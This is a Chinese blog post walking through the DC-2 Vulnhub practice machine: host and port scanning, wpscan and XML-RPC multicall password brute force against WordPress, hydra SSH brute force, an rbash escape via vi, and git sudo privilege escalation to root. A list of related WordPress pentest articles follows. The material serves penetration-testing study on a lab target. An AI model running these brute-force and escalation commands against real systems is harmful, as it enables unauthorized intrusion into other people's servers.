DC-2靶机

最新推荐文章于 2024-12-22 13:20:43 发布
原创 最新推荐文章于 2024-12-22 13:20:43 发布 · 3k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux #运维 #服务器

下载安装

DC-2
用Vmware打开

信息收集

存后活主机探测

nmap -sP 192.168.124.0/24

在这里插入图片描述

端口服务探测

nmap -A 192.168.124.155
nmap -sS 192.168.124.155 -p 1-65535

在这里插入图片描述

目录扫描

python3 dirsearch.py -u http://dc-2/-e* -i 200
或
dirb http://dc-2/

在这里插入图片描述

网站服务探测

访问网站,发现访问不了,改以下本地DNS。

Linux
vim 、/etc/hosts
windows
C:\Windows\System32\drivers\etc

在这里插入图片描述

在这里插入图片描述
顺利访问,发现wordpress框架(nmap扫描时也扫出来了),并发现flag1的提示。
提示用Cewl生成字典,登录,联想到前面扫描的有登陆界面。

漏洞发现

cewl通过爬行网站获取关键信息创建一个密码字典:

cewl http://dc-2/ -w dict.txt

在这里插入图片描述
利用wpscan工具扫描用户

wpscan --url http://dc-2 --enumerate u

在这里插入图片描述
发现三个用户,用wpscan爆破用户,成功发现两个用户可登录。

wpscan --url http://dc-2 -U user.txt -P dict.txt

在这里插入图片描述
或者利用WordPress的XMLRPC 爆破账号密码
参考连接:https://blog.csdn.net/weixin_34010566/article/details/87980717
手动将账号密码组合制作成如下POST请求包,通过burp发送

#!xml
<methodCall>
  <methodName>system.multicall</methodName>
  <params><param>
    <value><array><data>
      <value><struct>
        <member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member>
        <member><name>params</name><value><array><data>
        //第一中密码组合
          <value><string>admin</string></value>
          <value><string>admin888</string></value>
        </data></array></value></member>
      </struct></value>
 
      <value><struct>
        <member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member>
        <member><name>params</name><value><array><data>
        //第二种密码组合
          <value><string>guest</string></value>
          <value><string>test</string></value>
        </data></array></value></member>
      </struct></value>
    </data></array></value>
  </param></params>
</methodCall>

将上面包含两个子调用的 XML 请求发送至 xmlrpc 服务端入口,若目标开启了 xmlrpc 服务会返回类似如下的信息:

#!xml
<?xml version="1.0" encoding="UTF-8"?>
<methodResponse>
  <params>
    <param>
      <value>
      <array><data>
      //第一种密码组合正确
  <value><array><data>
  <value><array><data>
  <value><struct>
  <member><name>isAdmin</name><value><boolean>1</boolean></value></member>
  <member><name>url</name><value><string>http://172.16.96.130/xampp/wordpress-4.3.1/</string></value></member>
  <member><name>blogid</name><value><string>1</string></value></member>
  <member><name>blogName</name><value><string>WordPress 4.3.1</string></value></member>
  <member><name>xmlrpc</name><value><string>http://172.16.96.130/xampp/wordpress-4.3.1/xmlrpc.php</string></value></member>
</struct></value>
//第二种密码组合错误
</data></array></value>
</data></array></value>
  <value><struct>
  <member><name>faultCode</name><value><int>403</int></value></member>
  <member><name>faultString</name><value><string>用户名或密码不正确。</string></value></member>
</struct></value>
</data></array>
      </value>
    </param>
  </params>
</methodResponse>
复制代码

在这里插入图片描述

漏洞利用

登录网站后台

利用上面的用户登录后台。在jerry用户的pages里发现flag2,
在这里插入图片描述
提示如果我们不能利用WordPress,采取另一种方法。
想到之前扫出7744端口,尝试ssh连接。
hydra爆破ssh,用之前生成的字典

hydra -l tom -P /dict.txt -t 4  -s 7744 ssh://192.168.124.155

在这里插入图片描述

登录ssh

爆出ssh用户名,密码,成功登录ssh.
在这里插入图片描述
发现flag3.txt,但是返回的是rbash

绕过rbash

参考连接:https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/

  1. 检查可用命令,操作符,shell,编程语言,发现Vi可用
vi
:set shell=/bin/sh
:shell

在这里插入图片描述
在这里插入图片描述
!
!在这里插入图片描述
得到sh权限,查看环境变量,然后改变环境变量

export
export PATH=/usr/sbin:/usr/bin:/sbin:/bin

在这里插入图片描述
提示我们切换到jerry用户下,用钱买你收集到的密码登录,切换到~目录下,找到flag4

su jerry  
adipiscing   #jerry用户登录密码
cd ~
ls

在这里插入图片描述
查看flag4,提示git提权

提权

git提权

参考连接:https://gtfobins.github.io/gtfobins/git/

sudo -l    #查看可以使用root权限无密码的命令,有git命令
sudo git -p –-help config  #提权

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在/root目录下找到最终flag。

Wordpress网站渗透测试(进阶详细思路)
weixin_51957047的博客
05-26 8517
web渗透测试,wordpress网站渗透测试思路
DC-2靶机渗透测试过程(个人学习)
m0_59028058的博客
07-12 1443
使用tom目录查看当前文件夹下的文件可以发先flag3.txt文件,使用 cat 命令显示存在 rbash 限制,这里可以用 vi 来查看flag3.txt文件中的内容。在探测端口和服务的时候可以发现靶机开放了一个ssh端口,只不过不是默认的22端口,是7744端口,尝试利用jerry和tom账户ssh连接。扫描出来可以就可以发现80端口存在一个无法重定向的问题,我们访问网页无法重定向到dc-2这个域名中,则需要修改一下hosts文件。在flag3的提示中,提示了“su”,可能需要用到sudo提权。
干货 | Wordpress网站渗透方法指南
leah126的博客
05-03 3671
如果您遇到使用 WordPress 的网站,您会怎么做,渗透思路和安全检测思路?
如何渗透测试WordPress网站
kuxing100的专栏
07-26 3337
原文:http://www.freebuf.com/articles/web/5264.html 前言 英语水平有限,许多地方翻译的不是很通顺,请各位海涵。初见该文章便对文章作者很是佩服,因为在文章中详细的讲述了每一个步骤,这对于初学者来说尤为难得。所以决定将该文章翻译出来,供大家借鉴学习。 正文 原文题目:How Hackers Target and Hack Your Site
WordPress网站进行渗透测试 – 详解
zhalang8324的博客
01-13 5426
WordPress是一个专注于PHP和MySQL的免费在线开源内容托管系统。这是一个功能强大且使用最多的博客工具。 由于WordPress使用过程中出现了太多的错误,所以需要提高安全性。WordPress渗透测试对于发现漏洞并保护您的WordPress博客非常重要。 安全研究人员丹尼尔·西德说,在2016年,至少有15769个甚至更多的WordPress网站已经被入侵。 根据Su
渗透测试PRIME
weixin_44727454的博客
04-07 4220
实验环境 靶机IP:192.168.172.128(通过netdiscover获取) Kali机IP:192.168.172.130 nmap(开放端口) wfuzz(模糊测试) wpscan(针对wordpress) msfvenom (生成回环连接) msfconsole(启用监听模块)
DC-2靶机进行渗透测试
zll___的博客
03-11 1184
DC-2靶机进行渗透测试
Vulnhub DC-2靶机攻击实战(一)
初学者
12-06 895
篇幅有限,后续的三个flag在后续的分享中展示。
Vulnhub-DC-2靶机实战
御七彩虹猫
03-28 4021
Vulnhub-DC-2靶机实战
DC-2靶机渗透全流程详细
qq_63940076的博客
03-20 2838
执行x的时候就相当于在执行shell这个同样是需要设置环境变量,这里就不再赘述获得命令权限后,我们寻找下一个flag找到flag3,提示susu是切换账户的命令,现在我们唯一另外的账户就是jerry,试试吧账号:jerry 密码:adipiscing密码来自于前面WPScan爆破所得Ok,查看权限查找下一个flagFlag4提示git,应该是要提权,一般最后一个flag都是提权到root。
wordpress-exploit-framework:一个旨在帮助WordPress系统进行渗透测试的Ruby框架
02-05
WordPress漏洞利用框架 一个旨在帮助WordPress系统进行渗透测试的Ruby框架。 安装 要安装最新的稳定版本,请运行gem install wpxf 。 安装后,您可以通过运行wpxf启动WordPress Exploit Framework控制台。 我需要运行什么? 要运行WordPress Exploit Framework,需要Ruby> = 2.4.4。 安装疑难解答 Debian系统 如果您在安装WPXF的依赖项时遇到问题(特别是Nokogiri),请首先确保您具有编译C扩展所需的所有工具: sudo apt-get install build-essentia
WPCracker:WordPress 渗透测试工具
05-29
WP破解器 适用于 Windows 和 LinuxWordPress 用户枚举和登录 Brute Force 工具 使用“蛮力”工具,您可以控制要执行的攻击的攻击程度,这会影响所需的攻击时间。 该工具可以调整线程数量以及每次测试每个线程的密码批次大小。 但是,过多的攻击力会导致受害者的服务器变慢。 例如,当我攻击我的本地服务器时,当我使用程序预设的线程数(12)和批处理大小(1000)时,大约需要两天时间才能通过rockyou.txt(14,341,564个唯一密码) )。 在本文中,“受害者”是指 pentest 实验室中被攻击的 WordPress 站点。 攻击您无权访问的 WordPress 站点可能是非法的。 使用: 用户枚举 . \W PCracker.exe --enum -u < Url> -o < Output
Vulnhub-DC2
weixin_44770698的博客
01-16 822
靶场练习
渗透wordpress过程
weixin_44205564的博客
10-16 2316
渗透wordpress过程
搭建WordPress渗透测试靶机
D-R0s1的博客
01-24 3776
        想要提高自己在实战中渗透的技术,就要在靶机中不断地训练,今天和大家一起搭建一个WordPress网站的渗透环境,文章很基础,希望可以帮到像我一样的技术小白。 第一步:         我们需要在https://www.turnkeylinux.org/wordpress中下载镜像,因为网站是全英文的,所以在这里我给大家附上几张图,大家根据图示就可以轻松的找到下载的地方。 ...
wordpress靶机渗透
badminton_0的博客
08-06 1175
访问靶机网页,是一个wordpress站点 使用awvs扫描发现弱口令密码 Dirb扫描网站目录phpmyadmin,wp-login.php 登陆admin,发现 flag1 在此网站目录下找到flag2 wpscan扫描用户,写入user.txt cewl生成字典 wpscan爆破 获得密码 使用wordpress 登录 得到flag4 flag3 登陆后台修改404页面写入脚本 蚁剑...
网络安全-企业环境渗透2-wordpress任意文件读&&FFmpeg任意文件读
2401_88326591的博客
12-21 902
而config命令的替换一定是写在redis的配置文件中的,配置文件的路径又可以在redis中执行info获取到。经过进一步的探测,判断这个wordpress中存在phpmailer的命令执行漏洞,这个漏洞的特点是通过HTTP包中的Host字段触发,唯一的前提条件是需要知道管理员的用户名。查看网页中的信息可知,是通过ffmpeg处理视频的小应用,只有上传,下载和删除功能,此处存在ffmpeg文件读取漏洞,构造特定的avi视频,经过ffmpeg处理之后的视频就会包含想要的文件内容。
WordPress站点的渗透过程
热门推荐
whatiwhere的博客
06-02 1万+
实验环境 操作机 :Kali 2017 操作机IP:172.16.11.2 目标机:Windows 7 目标机IP:172.16.12.2 实验目的 学习WordPress站点的渗透过程 掌握WordPress后台暴力破解方法 知晓弱密码对网站的危害 实验工具 WPscan:WordPress站点漏洞扫描探测工具,用于探测站点存在的漏洞情况,可检测插件的漏洞 WordBrute...
基于 WordPress 站点的渗透测试案例剖析
最新发布
m0_57935885的博客
12-22 1978
若目标存在 AD 域环境,则需深入开展域渗透工作,对于无法出网的 PC,可通过设置代理使其连接外网,重复提权操作以获取更高权限,进而定位域控、数据库等关键服务器,扩大攻击面,获取更多有价值的数据和肉鸡。在整个渗透测试结束后,务必进行全面的日志清理工作,删除植入的木马后门程序,恢复被篡改的系统文件和配置,确保目标系统能够正常、安全地运行。核心及相关组件,对用户输入进行严格的过滤和验证,限制文件上传的类型和权限,定期进行安全审计和漏洞扫描,以有效防范类似的安全风险。,利用目录遍历的方式尝试突破文件下载限制。
DC-1靶机渗透测试攻略及DC-2靶机简介
靶机DC-2,尽管在标题和描述中未被提及,但从文件名称列表中可以得知,它也是Vulnhub系列中的一个靶机。根据名称推断,DC-2可能与DC-1具有相似的主题或设计理念,但具体细节和挑战会有所差异,测试人员在面对DC-2时...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值